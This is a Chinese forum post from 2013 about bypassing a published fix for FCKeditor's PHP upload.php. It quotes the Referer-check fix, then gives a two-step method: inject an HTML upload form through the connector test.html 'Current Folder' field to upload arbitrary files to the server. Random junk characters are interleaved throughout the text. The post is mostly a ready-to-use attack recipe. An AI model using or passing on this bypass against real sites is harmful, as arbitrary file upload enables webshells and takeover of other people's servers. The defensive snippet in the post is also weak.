漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php; X2 e3 u/ F& q. \6 I
网上给出的修复方案是
$ h) b$ b) d, W. g! u% A修复方法,删除FCK编辑器用其他的编辑器
$ w8 h1 ]$ t- q7 h! h0 {或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件0 f4 _- x" E( h0 u8 W3 K
在
4 |, G @' w# E Grequire(‘config.php’);: a- n) m, } \7 Q, m- Z
require(‘util.php’);
{* O' f% {* W3 |的下面添加以下代码—————————–
- f% k7 z& D/ `//防止外部提交
8 }* O" {2 a2 t: ~ i6 Kfunction outsidepost()
% `' I7 a8 Z* Y{5 k8 i! Z$ \ M" f$ K0 A
$servername=$_SERVER['SERVER_NAME'];
5 g5 y, ]1 P0 h) Z5 n$sub_from=@$_SERVER['HTTP_REFERER'];
C; R; l* {6 v$ S& G' @$sub_len=strlen($servername);
/ {% S+ @0 }( s, { T. l8 A4 N$checkfrom=substr($sub_from,7,$sub_len);
8 t+ d; v" j, L) m3 v2 sif($checkfrom!=$servername){
/ \4 m l( h+ w, Q" ?- w$ E/ `echo(“you don’t outsidepost!”);
1 }6 r. G M: }; A5 Lexit;- m x7 |" n T! |
}
9 U" k# V8 T$ H4 S0 f7 `3 H}5 c. X; a" N6 R8 ^1 A
outsidepost();
7 K$ s; ?$ l+ W8 l3 L防止外部提交,但是没有防止内部提交,: Y+ M @/ N0 L$ \& J* A5 g' e; e5 Z
利用方法:
9 G9 m( v" Z: ]1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
+ e) e# c" h6 b& {2,在Current Folder 框输入
' c7 U& M% C: i! o( G' C4 v<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>( q1 q. @ x$ I* P
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。% }1 @' R) {; u+ ~. W. `4 x
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对